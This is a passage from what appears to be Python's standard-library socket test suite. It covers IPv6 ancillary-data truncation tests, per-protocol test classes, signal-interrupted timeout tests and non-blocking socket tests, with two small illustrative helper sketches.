@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
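# Illustrative sketch (not part of the test suite) of the RFC 3542 pattern that
# RFC3542AncillaryTest drives above: enable IPV6_RECVHOPLIMIT so the kernel
# attaches the hop limit of each incoming datagram as ancillary data, then read
# it back from recvmsg().  Assumes the IPv6 loopback address ("::1") is usable.
def _hop_limit_sketch():
    needed = ("IPPROTO_IPV6", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT", "CMSG_SPACE")
    if not all(hasattr(socket, name) for name in needed):
        return None
    if not hasattr(socket.socket, "recvmsg"):
        return None
    receiver = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    sender = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    with receiver, sender:
        receiver.bind(("::1", 0))
        receiver.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
        sender.sendto(b"ping", receiver.getsockname())
        msg, ancdata, flags, addr = receiver.recvmsg(
            1024, socket.CMSG_SPACE(SIZEOF_INT))
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            if (cmsg_level == socket.IPPROTO_IPV6 and
                    cmsg_type == socket.IPV6_HOPLIMIT):
                hop = array.array("i")
                hop.frombytes(cmsg_data)
                return hop[0]
    return None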
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a
    # SIGALRM handler that raises ZeroDivisionError and removes it on
    # teardown, along with any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError
        # (propagated from the SIGALRM handler) when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (propagated from the SIGALRM handler) when
        # interrupted by a signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
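# Illustrative sketch (not part of the test suite) of the interruption technique
# used by the two test classes above: install a SIGALRM handler that raises,
# schedule the alarm with setitimer(), and observe the exception escape an
# otherwise blocking recv() on a socket with a timeout.  Must run in the main
# thread, since signal.signal() is restricted to it.
def _interrupted_recv_sketch(sock, delay=0.05):
    if not (hasattr(signal, "setitimer") and hasattr(signal, "SIGALRM")):
        return None
    def _raise(signum, frame):
        raise ZeroDivisionError  # mirrors the handler installed in setUp() above
    old_handler = signal.signal(signal.SIGALRM, _raise)
    try:
        signal.setitimer(signal.ITIMER_REAL, delay)
        try:
            return sock.recv(1024)
        except ZeroDivisionError:
            return None  # the blocking call was interrupted, as the tests expect
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)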
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
            # operations use a `select()` call and handle EWOULDBLOCK/EAGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
